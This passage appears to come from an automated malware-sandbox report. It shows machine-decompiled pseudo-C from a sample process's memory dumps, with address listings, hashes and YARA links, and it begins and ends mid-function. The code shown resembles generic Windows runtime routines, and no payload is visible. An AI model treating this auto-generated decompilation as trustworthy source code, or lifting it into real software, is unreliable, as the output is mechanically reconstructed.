					_t91 = 0;
					if( *((intOrPtr*)(_t159 + (_v16 + 0xfffffffc) * 8 + 4)) == 0) {
						_t124 = 0;
					} else {
						_t124 = E1E3D1710(_t134);
						_t91 = 0;
					}
					if(_t124 != 0) {
						_t94 = 1 <<  *(_t124 + 0x1c);
						__eflags = 1;
						goto L22;
					} else {
						 *0x1e49b1e0( *_t159, _v20, _t91, _a4);
						_t124 =  *( *(_t159 + 4) ^  *0x1e496110 ^ _t159)();
						if(_t124 != 0) {
							_t94 = 0;
							_t160 = 0;
							L22:
							__eflags =  *0x1e49610c & 0x00000002;
							_v16 = _t94;
							if(( *0x1e49610c & 0x00000002) == 0) {
								L25:
								_t95 = E1E46D597(_v20, _v28);
								_t156 = _t95;
								_v12 = _t95;
								L26:
								_t96 = _v16;
								__eflags = _t96;
								if(_t96 != 0) {
									__eflags =  *((char*)(_t124 + 0x1d)) - 1;
									if( *((char*)(_t124 + 0x1d)) > 1) {
										_t169 = _t96 >> 0xc;
										__eflags = _t169;
										_t160 =  ~_t169;
										_v24 = _t160;
									}
								}
								__eflags = _t96 - _t156;
								if(_t96 >= _t156) {
									L33:
									_t137 = _v20;
									__eflags = _t156 - _t137;
									if(_t156 != _t137) {
										_t160 = _t160 + (_t156 >> 0xc);
										__eflags = _t160;
									}
									__eflags = _t160;
									if(_t160 != 0) {
										asm("lock xadd [eax], esi");
									}
									_push(_t137);
									_t156 = _t137;
									E1E46DEF6(_t124, _t137, _t137, _v28);
									asm("lock inc dword [eax+0x20]");
									asm("lock xadd [eax], ecx");
									_t161 = _t124;
									_t124 = 0;
									__eflags = 0;
									goto L38;
								} else {
									 *0x1e49b1e0( *_t159, _t124, _t156);
									_t110 =  *( *(_t159 + 0xc) ^  *0x1e496110 ^ _t159)();
									__eflags = _t110;
									if(_t110 >= 0) {
										_t160 = _v24;
										_t156 = _v12;
										goto L33;
									}
									_t161 = 0;
									L38:
									_v12 = _t161;
									__eflags = _t124;
									if(_t124 != 0) {
										_t164 =  *(_t159 + 8) ^  *0x1e496110 ^ _t159;
										__eflags = _t164;
										 *0x1e49b1e0( *_t159, _t124, _v20, _a4);
										 *_t164();
										_t161 = _v12;
									}
									L40:
									if(_v32 == 0) {
										E1E3CFA00(_t124, _t159 + 0x34, _t159, _t159 + 0x34);
									}
									return E1E3EB640(_t161, _t124, _v8 ^ _t173, _t156, _t159, _t161);
								}
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L25;
							}
							_t156 = _v20;
							_v12 = _t156;
							goto L26;
						}
						_t161 = 0;
						goto L40;
					}
				}
				_t146 = _v36;
				if(_v32 > _v36 >> 6) {
					goto L11;
				}
				_t118 = E1E46A359(_t146,  *((intOrPtr*)(_t159 + 0x2c)));
				_t147 = _t118;
				_v16 = _t118;
				if(_t147 <= 0xc) {
					_t147 = 0xc;
					_v16 = _t147;
				}
				_t88 = 1;
				_t156 = 1 << _t147;
				if(_t123 > 1) {
					_v20 = 1;
				}
				goto L12;
			}






































                                  0x1e46d625
                                  0x1e46d629
                                  0x1e46d62d
                                  0x1e46d62f
                                  0x1e46d632
                                  0x1e46d638
                                  0x1e46d63f
                                  0x1e46d641
                                  0x1e46d64c
                                  0x1e46d64f
                                  0x1e46d660
                                  0x1e46d651
                                  0x1e46d659
                                  0x1e46d659
                                  0x1e46d667
                                  0x1e46d66e
                                  0x1e46d67c
                                  0x1e46d69a
                                  0x1e46d6a0
                                  0x1e46d6a5
                                  0x1e46d6a7
                                  0x1e46d6ad
                                  0x1e46d6b1
                                  0x1e46d6b2
                                  0x1e46d6b2
                                  0x1e46d6b8
                                  0x1e46d6c1
                                  0x1e46d6c4
                                  0x1e46d6fb
                                  0x1e46d6fd
                                  0x1e46d6fd
                                  0x1e46d6fe
                                  0x1e46d701
                                  0x1e46d703
                                  0x1e46d706
                                  0x1e46d70c
                                  0x1e46d70c
                                  0x1e46d717
                                  0x1e46d71a
                                  0x1e46d720
                                  0x1e46d72d
                                  0x1e46d722
                                  0x1e46d727
                                  0x1e46d729
                                  0x1e46d729
                                  0x1e46d731
                                  0x1e46d76a
                                  0x1e46d76a
                                  0x00000000
                                  0x1e46d733
                                  0x1e46d749
                                  0x1e46d751
                                  0x1e46d755
                                  0x1e46d75e
                                  0x1e46d760
                                  0x1e46d76c
                                  0x1e46d76c
                                  0x1e46d773
                                  0x1e46d776
                                  0x1e46d786
                                  0x1e46d78c
                                  0x1e46d791
                                  0x1e46d793
                                  0x1e46d796
                                  0x1e46d796
                                  0x1e46d799
                                  0x1e46d79b
                                  0x1e46d79d
                                  0x1e46d7a1
                                  0x1e46d7a5
                                  0x1e46d7a5
                                  0x1e46d7a8
                                  0x1e46d7aa
                                  0x1e46d7aa
                                  0x1e46d7a1
                                  0x1e46d7ad
                                  0x1e46d7af
                                  0x1e46d7d8
                                  0x1e46d7d8
                                  0x1e46d7db
                                  0x1e46d7dd
                                  0x1e46d7e4
                                  0x1e46d7e4
                                  0x1e46d7e4
                                  0x1e46d7e6
                                  0x1e46d7e8
                                  0x1e46d7f0
                                  0x1e46d7f0
                                  0x1e46d7f4
                                  0x1e46d7f9
                                  0x1e46d7fd
                                  0x1e46d805
                                  0x1e46d810
                                  0x1e46d814
                                  0x1e46d816
                                  0x1e46d816
                                  0x00000000
                                  0x1e46d7b1
                                  0x1e46d7c2
                                  0x1e46d7c8
                                  0x1e46d7ca
                                  0x1e46d7cc
                                  0x1e46d7d2
                                  0x1e46d7d5
                                  0x00000000
                                  0x1e46d7d5
                                  0x1e46d7ce
                                  0x1e46d818
                                  0x1e46d818
                                  0x1e46d81b
                                  0x1e46d81d
                                  0x1e46d831
                                  0x1e46d831
                                  0x1e46d835
                                  0x1e46d83b
                                  0x1e46d83d
                                  0x1e46d83d
                                  0x1e46d840
                                  0x1e46d844
                                  0x1e46d84a
                                  0x1e46d84a
                                  0x1e46d861
                                  0x1e46d861
                                  0x1e46d7af
                                  0x1e46d778
                                  0x1e46d77c
                                  0x00000000
                                  0x00000000
                                  0x1e46d77e
                                  0x1e46d781
                                  0x00000000
                                  0x1e46d781
                                  0x1e46d757
                                  0x00000000
                                  0x1e46d757
                                  0x1e46d731
                                  0x1e46d6c6
                                  0x1e46d6d1
                                  0x00000000
                                  0x00000000
                                  0x1e46d6d6
                                  0x1e46d6db
                                  0x1e46d6dd
                                  0x1e46d6e3
                                  0x1e46d6e7
                                  0x1e46d6e8
                                  0x1e46d6e8
                                  0x1e46d6ed
                                  0x1e46d6f0
                                  0x1e46d6f4
                                  0x1e46d6f6
                                  0x1e46d6f6
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: e16b85c5401582505b77826aa731a4e248508cc1f3560ea82ae9fbb29566543a
                                  • Instruction ID: 28da0017c703c9088e55acef7a20415ce15c3614e2450b653e5aff999b19305d
                                  • Opcode Fuzzy Hash: e16b85c5401582505b77826aa731a4e248508cc1f3560ea82ae9fbb29566543a
                                  • Instruction Fuzzy Hash: E2819375E0026A9BCB08DFA5D88066EBBF5FF8C201F15866AD455EB340DB70A951CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E47DFCE, Relevance: 3.5, APIs: 2, Instructions: 458COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E1E47DFCE(intOrPtr __ecx, signed int __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t173;
				signed int _t175;
				unsigned int _t177;
				intOrPtr _t178;
				signed int _t201;
				unsigned int _t223;
				unsigned int _t240;
				signed int _t258;
				intOrPtr _t269;
				signed int _t270;
				signed char _t271;
				signed char _t273;
				signed int _t274;
				intOrPtr* _t281;
				signed int* _t284;
				signed char _t292;
				signed int _t293;
				signed char _t300;
				signed char _t305;
				intOrPtr _t314;
				signed int _t315;
				signed int _t319;
				signed int _t323;
				intOrPtr _t326;
				signed char _t328;
				signed int _t334;
				signed char _t335;
				void* _t365;
				signed int _t368;
				signed int* _t373;
				signed int _t377;
				signed int _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				unsigned int _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				signed int _t393;
				signed int _t406;
				signed int _t407;

				_t367 = __edx;
				_v8 =  *0x1e49d360 ^ _t407;
				_t269 = __ecx;
				_v44 = __ecx;
				if(__ecx == 0) {
					L80:
					_t270 = 0;
					L81:
					return E1E3EB640(_t270, _t270, _v8 ^ _t407, _t367, _t383, _t392);
				}
				_t383 = _a4;
				if(_t383 == 0 || __edx == 0) {
					goto L80;
				} else {
					_v56 = _t383;
					_t393 = 0x4cb2f;
					_t384 = _t383 << 2;
					_v52 = __edx;
					if(_t384 < 8) {
						L7:
						_t385 = _t384 - 1;
						if(_t385 == 0) {
							L20:
							_t392 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							L21:
							_t15 = _t269 + 0x18; // 0x1e498680
							_v48 = _t15;
							L1E3CFAD0(_t15);
							_t17 = _t269 + 0xc; // 0x1e498674
							_t367 = _t17;
							_t383 = 0;
							_v20 = _t367;
							_t271 = 0;
							while(1) {
								L22:
								_t19 = _t367 + 4; // 0x0
								_t173 =  *_t19;
								_v12 = _v12 | 0xffffffff;
								_v12 = _v12 << (_t173 & 0x0000001f);
								_t300 = _t392 & _v12;
								_v16 = _t300;
								_v16 = _v16 >> 0x18;
								_v28 = _t300;
								_v28 = _v28 >> 0x10;
								_v24 = _t300;
								_v24 = _v24 >> 8;
								_v32 = _t300;
								if(_t271 != 0) {
									goto L25;
								}
								_t240 = _t173 >> 5;
								_v36 = _t240;
								if(_t240 == 0) {
									_t270 = _t383;
									L34:
									if(_t270 == 0) {
										L38:
										_t272 = _v48;
										E1E3CFA00(_v48, _t300, _t383, _v48);
										_t367 =  &_v56;
										_t175 = E1E47E62A(_v44,  &_v56, _t392);
										_v36 = _t175;
										if(_t175 != 0) {
											E1E3C2280(_t175, _t272);
											_t273 = _t383;
											do {
												_t368 = _v20;
												_v12 = _v12 | 0xffffffff;
												_t177 =  *(_t368 + 4);
												_v12 = _v12 << (_t177 & 0x0000001f);
												_t305 = _v12 & _t392;
												_v24 = _t305;
												_v24 = _v24 >> 0x18;
												_v28 = _t305;
												_v28 = _v28 >> 0x10;
												_v16 = _t305;
												_v16 = _v16 >> 8;
												_v40 = _t305;
												if(_t273 != 0) {
													while(1) {
														L44:
														_t273 =  *_t273;
														if((_t273 & 0x00000001) != 0) {
															break;
														}
														if(_t305 == ( *(_t273 + 4) & _v12)) {
															L48:
															if(_t273 == 0) {
																L55:
																_t178 = _v44;
																_t274 =  *(_t368 + 4);
																_v16 =  *((intOrPtr*)(_t178 + 0x28));
																_v32 =  *(_t178 + 0x20);
																_t181 = _t274 >> 5;
																_v24 =  *((intOrPtr*)(_t178 + 0x24));
																if( *_t368 < (_t274 >> 5) + (_t274 >> 5)) {
																	L76:
																	_t383 = _v36;
																	_t153 = (_t274 >> 5) - 1; // 0xffffffdf
																	_t367 = _t153 & (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000018) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000010 & 0x000000ff) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000008 & 0x000000ff) + (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4) & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																	_t281 = _v20;
																	_t314 =  *((intOrPtr*)(_t281 + 8));
																	 *_t383 =  *(_t314 + _t367 * 4);
																	 *(_t314 + _t367 * 4) = _t383;
																	 *_t281 =  *_t281 + 1;
																	E1E3BFFB0(_t281, _t383, _v48);
																	goto L39;
																}
																_t315 = 2;
																if(E1E3DF3D5( &_v40, _t181 * _t315, _t181 * _t315 >> 0x20) < 0) {
																	goto L76;
																}
																_t392 = _v40;
																if(_t392 < 4) {
																	_t392 = 4;
																}
																 *0x1e49b1e0(_t392 << 2, _v16);
																_t373 =  *_v32();
																_v12 = _t373;
																if(_t373 == 0) {
																	_t274 =  *(_v20 + 4);
																	if(_t274 >= 0x20) {
																		goto L76;
																	}
																	L78:
																	_t270 = _t383;
																	L79:
																	E1E3BFFB0(_t270, _t383, _v48);
																	_t367 = _v36;
																	E1E47E5B6(_v44, _v36);
																	goto L81;
																} else {
																	_t107 = _t392 - 1; // 0x3
																	_t319 = _t107;
																	if((_t392 & _t319) == 0) {
																		L64:
																		if(_t392 > 0x4000000) {
																			_t392 = 0x4000000;
																		}
																		_t284 = _t373;
																		_t201 = _v20 | 0x00000001;
																		asm("sbb ecx, ecx");
																		_t323 =  !(_v12 + (_t392 << 2)) & _t392 << 0x00000002 >> 0x00000002;
																		if(_t323 <= 0) {
																			L69:
																			_t377 = _v20;
																			_v40 = (_t201 | 0xffffffff) << ( *(_t377 + 4) & 0x0000001f);
																			if(( *(_t377 + 4) & 0xffffffe0) <= 0) {
																				L74:
																				_t326 =  *((intOrPtr*)(_t377 + 8));
																				_t274 =  *(_t377 + 4) & 0x0000001f | _t392 << 0x00000005;
																				 *((intOrPtr*)(_t377 + 8)) = _v12;
																				 *(_t377 + 4) = _t274;
																				if(_t326 != 0) {
																					 *0x1e49b1e0(_t326, _v16);
																					 *_v24();
																					_t274 =  *(_v20 + 4);
																				}
																				goto L76;
																			} else {
																				goto L70;
																			}
																			do {
																				L70:
																				_t378 =  *((intOrPtr*)(_t377 + 8));
																				_v28 = _t378;
																				while(1) {
																					_t328 =  *(_t378 + _t383 * 4);
																					_v32 = _t328;
																					if((_t328 & 0x00000001) != 0) {
																						goto L73;
																					}
																					 *(_t378 + _t383 * 4) =  *_t328;
																					_t381 = _v12;
																					_t132 = _t392 - 1; // -1
																					_t334 = _t132 & (( *(_t328 + 4) & _v40) >> 0x00000018) + ((( *(_t328 + 4) & _v40) >> 0x00000010 & 0x000000ff) + ((( *(_t328 + 4) & _v40) >> 0x00000008 & 0x000000ff) + (( *(_t328 + 4) & _v40 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																					_t292 = _v32;
																					 *_t292 =  *(_t381 + _t334 * 4);
																					 *(_t381 + _t334 * 4) = _t292;
																					_t378 = _v28;
																				}
																				L73:
																				_t377 = _v20;
																				_t383 = _t383 + 1;
																			} while (_t383 <  *(_t377 + 4) >> 5);
																			goto L74;
																		} else {
																			_t382 = _t383;
																			do {
																				_t382 = _t382 + 1;
																				 *_t284 = _t201;
																				_t284 =  &(_t284[1]);
																			} while (_t382 < _t323);
																			goto L69;
																		}
																	}
																	_t335 = _t319 | 0xffffffff;
																	if(_t392 == 0) {
																		L63:
																		_t392 = 1 << _t335;
																		goto L64;
																	} else {
																		goto L62;
																	}
																	do {
																		L62:
																		_t335 = _t335 + 1;
																		_t392 = _t392 >> 1;
																	} while (_t392 != 0);
																	goto L63;
																}
															}
															goto L49;
														}
													}
													_t273 = _t383;
													goto L48;
												}
												_t223 = _t177 >> 5;
												_v32 = _t223;
												if(_t223 == 0) {
													_t273 = _t383;
													L51:
													if(_t273 == 0) {
														goto L55;
													}
													_t88 = _t273 + 8; // 0x8
													if(E1E47E7A8(_t88) != 0) {
														goto L79;
													}
													goto L78;
												}
												_t273 =  *((intOrPtr*)(_t368 + 8)) + (_v32 - 0x00000001 & (_v24 & 0x000000ff) + 0x164b2f3f + (((_t305 & 0x000000ff) * 0x00000025 + (_v16 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
												_t305 = _v40;
												goto L44;
												L49:
											} while (E1E47EE71(_t273,  &_v56) == 0);
											_t368 = _v20;
											goto L51;
										}
										L39:
										_t270 = _t383;
										goto L81;
									}
									_t50 = _t270 + 8; // 0x8
									_t345 = _t50;
									if(E1E47E7A8(_t50) == 0) {
										_t270 = _t383;
									}
									E1E3CFA00(_t270, _t345, _t383, _v48);
									goto L81;
								}
								_t40 = _t367 + 8; // 0x0
								_t271 =  *_t40 + (_v36 - 0x00000001 & (_v16 & 0x000000ff) + 0x164b2f3f + (((_t300 & 0x000000ff) * 0x00000025 + (_v24 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
								_t300 = _v32;
								L25:
								_t367 = _v12;
								while(1) {
									_t271 =  *_t271;
									if((_t271 & 0x00000001) != 0) {
										break;
									}
									if(_t300 == ( *(_t271 + 4) & _t367)) {
										L30:
										if(_t270 == 0) {
											goto L38;
										}
										if(E1E47EE71(_t270,  &_v56) != 0) {
											goto L34;
										}
										_t367 = _v20;
										goto L22;
									}
								}
								_t270 = _t383;
								goto L30;
							}
						}
						_t386 = _t385 - 1;
						if(_t386 == 0) {
							L19:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L20;
						}
						_t387 = _t386 - 1;
						if(_t387 == 0) {
							L18:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L19;
						}
						_t388 = _t387 - 1;
						if(_t388 == 0) {
							L17:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L18;
						}
						_t389 = _t388 - 1;
						if(_t389 == 0) {
							L16:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L17;
						}
						_t390 = _t389 - 1;
						if(_t390 == 0) {
							L15:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L16;
						}
						if(_t390 != 1) {
							goto L21;
						}
						_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
						_t367 = _t367 + 1;
						goto L15;
					}
					_t258 = _t384 >> 3;
					_v36 = _t258;
					_t293 = _t258;
					_t384 = _t384 + _t258 * 0xfffffff8;
					do {
						_t365 = (((((( *(_t367 + 1) & 0x000000ff) * 0x25 + ( *(_t367 + 2) & 0x000000ff)) * 0x25 + ( *(_t367 + 3) & 0x000000ff)) * 0x25 + ( *(_t367 + 4) & 0x000000ff)) * 0x25 + ( *(_t367 + 5) & 0x000000ff)) * 0x25 + ( *(_t367 + 6) & 0x000000ff)) * 0x25 + ( *_t367 & 0x000000ff) * 0x1a617d0d;
						_t406 =  *(_t367 + 7) & 0x000000ff;
						_t367 = _t367 + 8;
						_t393 = _t406 + _t365 - _t393 * 0x2fe8ed1f;
						_t293 = _t293 - 1;
					} while (_t293 != 0);
					_t269 = _v44;
					goto L7;
				}
			}
































































                                  0x1e47dfce
                                  0x1e47dfdd
                                  0x1e47dfe1
                                  0x1e47dfe3
                                  0x1e47dfea
                                  0x1e47e49c
                                  0x1e47e49c
                                  0x1e47e49e
                                  0x1e47e4b0
                                  0x1e47e4b0
                                  0x1e47dff0
                                  0x1e47dff5
                                  0x00000000
                                  0x1e47e003
                                  0x1e47e003
                                  0x1e47e006
                                  0x1e47e00b
                                  0x1e47e00e
                                  0x1e47e014
                                  0x1e47e07d
                                  0x1e47e07d
                                  0x1e47e080
                                  0x1e47e0d6
                                  0x1e47e0dc
                                  0x1e47e0de
                                  0x1e47e0de
                                  0x1e47e0e2
                                  0x1e47e0e5
                                  0x1e47e0ea
                                  0x1e47e0ea
                                  0x1e47e0ed
                                  0x1e47e0ef
                                  0x1e47e0f2
                                  0x1e47e0f4
                                  0x1e47e0f4
                                  0x1e47e0f4
                                  0x1e47e0f4
                                  0x1e47e0f9
                                  0x1e47e100
                                  0x1e47e105
                                  0x1e47e108
                                  0x1e47e10b
                                  0x1e47e10f
                                  0x1e47e112
                                  0x1e47e116
                                  0x1e47e119
                                  0x1e47e11d
                                  0x1e47e122
                                  0x00000000
                                  0x00000000
                                  0x1e47e124
                                  0x1e47e127
                                  0x1e47e12c
                                  0x1e47e197
                                  0x1e47e199
                                  0x1e47e19b
                                  0x1e47e1b8
                                  0x1e47e1b8
                                  0x1e47e1bc
                                  0x1e47e1c4
                                  0x1e47e1c8
                                  0x1e47e1cd
                                  0x1e47e1d2
                                  0x1e47e1dc
                                  0x1e47e1e1
                                  0x1e47e1e3
                                  0x1e47e1e3
                                  0x1e47e1e6
                                  0x1e47e1ea
                                  0x1e47e1f2
                                  0x1e47e1f8
                                  0x1e47e1fa
                                  0x1e47e1fd
                                  0x1e47e201
                                  0x1e47e204
                                  0x1e47e208
                                  0x1e47e20b
                                  0x1e47e20f
                                  0x1e47e214
                                  0x1e47e258
                                  0x1e47e258
                                  0x1e47e258
                                  0x1e47e25d
                                  0x00000000
                                  0x00000000
                                  0x1e47e267
                                  0x1e47e26d
                                  0x1e47e26f
                                  0x1e47e2a3
                                  0x1e47e2a3
                                  0x1e47e2a6
                                  0x1e47e2ac
                                  0x1e47e2b5
                                  0x1e47e2ba
                                  0x1e47e2bd
                                  0x1e47e2c5
                                  0x1e47e418
                                  0x1e47e418
                                  0x1e47e451
                                  0x1e47e45e
                                  0x1e47e460
                                  0x1e47e463
                                  0x1e47e469
                                  0x1e47e46b
                                  0x1e47e46e
                                  0x1e47e470
                                  0x00000000
                                  0x1e47e470
                                  0x1e47e2cd
                                  0x1e47e2dc
                                  0x00000000
                                  0x00000000
                                  0x1e47e2e2
                                  0x1e47e2e8
                                  0x1e47e2ec
                                  0x1e47e2ec
                                  0x1e47e2fb
                                  0x1e47e303
                                  0x1e47e305
                                  0x1e47e30a
                                  0x1e47e47d
                                  0x1e47e483
                                  0x00000000
                                  0x00000000
                                  0x1e47e485
                                  0x1e47e485
                                  0x1e47e487
                                  0x1e47e48a
                                  0x1e47e48f
                                  0x1e47e495
                                  0x00000000
                                  0x1e47e310
                                  0x1e47e310
                                  0x1e47e310
                                  0x1e47e315
                                  0x1e47e328
                                  0x1e47e32f
                                  0x1e47e331
                                  0x1e47e331
                                  0x1e47e336
                                  0x1e47e340
                                  0x1e47e34b
                                  0x1e47e34f
                                  0x1e47e351
                                  0x1e47e35f
                                  0x1e47e35f
                                  0x1e47e374
                                  0x1e47e377
                                  0x1e47e3e6
                                  0x1e47e3e9
                                  0x1e47e3f5
                                  0x1e47e3f7
                                  0x1e47e3fa
                                  0x1e47e3ff
                                  0x1e47e40a
                                  0x1e47e410
                                  0x1e47e415
                                  0x1e47e415
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e47e379
                                  0x1e47e379
                                  0x1e47e379
                                  0x1e47e37c
                                  0x1e47e37f
                                  0x1e47e37f
                                  0x1e47e382
                                  0x1e47e388
                                  0x00000000
                                  0x00000000
                                  0x1e47e38c
                                  0x1e47e3b6
                                  0x1e47e3c1
                                  0x1e47e3c6
                                  0x1e47e3c8
                                  0x1e47e3ce
                                  0x1e47e3d0
                                  0x1e47e3d3
                                  0x1e47e3d3
                                  0x1e47e3d8
                                  0x1e47e3d8
                                  0x1e47e3db
                                  0x1e47e3e2
                                  0x00000000
                                  0x1e47e353
                                  0x1e47e353
                                  0x1e47e355
                                  0x1e47e355
                                  0x1e47e356
                                  0x1e47e358
                                  0x1e47e35b
                                  0x00000000
                                  0x1e47e355
                                  0x1e47e351
                                  0x1e47e317
                                  0x1e47e31c
                                  0x1e47e323
                                  0x1e47e326
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e47e31e
                                  0x1e47e31e
                                  0x1e47e31e
                                  0x1e47e31f
                                  0x1e47e31f
                                  0x00000000
                                  0x1e47e31e
                                  0x1e47e30a
                                  0x00000000
                                  0x1e47e26f
                                  0x1e47e269
                                  0x1e47e26b
                                  0x00000000
                                  0x1e47e26b
                                  0x1e47e216
                                  0x1e47e219
                                  0x1e47e21e
                                  0x1e47e29f
                                  0x1e47e286
                                  0x1e47e288
                                  0x00000000
                                  0x00000000
                                  0x1e47e28a
                                  0x1e47e294
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e47e29a
                                  0x1e47e252
                                  0x1e47e255
                                  0x00000000
                                  0x1e47e271
                                  0x1e47e27b
                                  0x1e47e283
                                  0x00000000
                                  0x1e47e283
                                  0x1e47e1d4
                                  0x1e47e1d4
                                  0x00000000
                                  0x1e47e1d4
                                  0x1e47e19d
                                  0x1e47e19d
                                  0x1e47e1a7
                                  0x1e47e1a9
                                  0x1e47e1a9
                                  0x1e47e1ae
                                  0x00000000
                                  0x1e47e1ae
                                  0x1e47e15d
                                  0x1e47e160
                                  0x1e47e163
                                  0x1e47e166
                                  0x1e47e166
                                  0x1e47e169
                                  0x1e47e169
                                  0x1e47e16e
                                  0x00000000
                                  0x00000000
                                  0x1e47e177
                                  0x1e47e17d
                                  0x1e47e17f
                                  0x00000000
                                  0x00000000
                                  0x1e47e18d
                                  0x00000000
                                  0x00000000
                                  0x1e47e18f
                                  0x00000000
                                  0x1e47e18f
                                  0x1e47e179
                                  0x1e47e17b
                                  0x00000000
                                  0x1e47e17b
                                  0x1e47e0f4
                                  0x1e47e082
                                  0x1e47e085
                                  0x1e47e0cd
                                  0x1e47e0d3
                                  0x1e47e0d5
                                  0x00000000
                                  0x1e47e0d5
                                  0x1e47e087
                                  0x1e47e08a
                                  0x1e47e0c4
                                  0x1e47e0ca
                                  0x1e47e0cc
                                  0x00000000
                                  0x1e47e0cc
                                  0x1e47e08c
                                  0x1e47e08f
                                  0x1e47e0bb
                                  0x1e47e0c1
                                  0x1e47e0c3
                                  0x00000000
                                  0x1e47e0c3
                                  0x1e47e091
                                  0x1e47e094
                                  0x1e47e0b2
                                  0x1e47e0b8
                                  0x1e47e0ba
                                  0x00000000
                                  0x1e47e0ba
                                  0x1e47e096
                                  0x1e47e099
                                  0x1e47e0a9
                                  0x1e47e0af
                                  0x1e47e0b1
                                  0x00000000
                                  0x1e47e0b1
                                  0x1e47e09e
                                  0x00000000
                                  0x00000000
                                  0x1e47e0a6
                                  0x1e47e0a8
                                  0x00000000
                                  0x1e47e0a8
                                  0x1e47e018
                                  0x1e47e01b
                                  0x1e47e01e
                                  0x1e47e023
                                  0x1e47e025
                                  0x1e47e062
                                  0x1e47e06a
                                  0x1e47e06e
                                  0x1e47e073
                                  0x1e47e075
                                  0x1e47e075
                                  0x1e47e07a
                                  0x00000000
                                  0x1e47e07a

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: ed375863ff52d5830bac26ee6f8e96f5654e6bb4dcc969da8a5591bd376518f5
                                  • Instruction ID: db1d442541855e21bffe8e4d51982f66807d1e2b89a488d1d24f8a19b215e3dc
                                  • Opcode Fuzzy Hash: ed375863ff52d5830bac26ee6f8e96f5654e6bb4dcc969da8a5591bd376518f5
                                  • Instruction Fuzzy Hash: 96F19572E002568BCB18CFA9C9D15ADFBF6EF48200B55436EE856EB385D734E941CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0008AA32, Relevance: 1.9, Strings: 1, Instructions: 642COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  • Opcode ID: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
                                  • Instruction ID: 9b6c014c6cd631f79bd9085643210daf7a17b65454b9d5272e5449dae86de9a4
                                  • Opcode Fuzzy Hash: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
                                  • Instruction Fuzzy Hash: 06226170B18A099FDB99EF68C4956AEF7E1FB98301F40422ED09ED7651DB30D851CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3BD5E0, Relevance: 1.9, APIs: 1, Instructions: 353timeCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E1E3BD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
